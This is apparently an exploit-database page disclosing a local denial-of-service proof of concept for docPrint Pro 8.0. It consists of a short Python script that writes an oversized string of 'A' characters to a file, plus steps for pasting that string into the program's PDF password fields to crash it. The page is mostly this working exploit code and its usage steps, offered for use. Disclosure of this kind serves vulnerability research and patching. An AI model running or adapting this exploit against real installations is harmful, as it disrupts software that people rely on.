docPrint Pro 8.0 Denial of Service (PoC)

2019.05.24

Credit: Alejandra Sánchez

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# -*- coding: utf-8 -*-
# Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC)
# Date: 19/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.verypdf.com
# Software: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "DocConverter.py", it will create a new file "DocConverter.txt"
# 2.- Copy the text from the generated DocConverterr.txt file to clipboard
# 3.- Open docPrint Document Converter
# 4.- Go to 'Setting' > 'PDF Security'
# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
# 6.- Click on 'Add File(s)', and select a supported file, e.g. 'sample.doc'
# 7.- Click on 'Start', you will see a crash
buffer = "\x41" * 3000
f = open ("DocConverter.txt", "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

docPrint Pro 8.0 Denial of Service (PoC)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.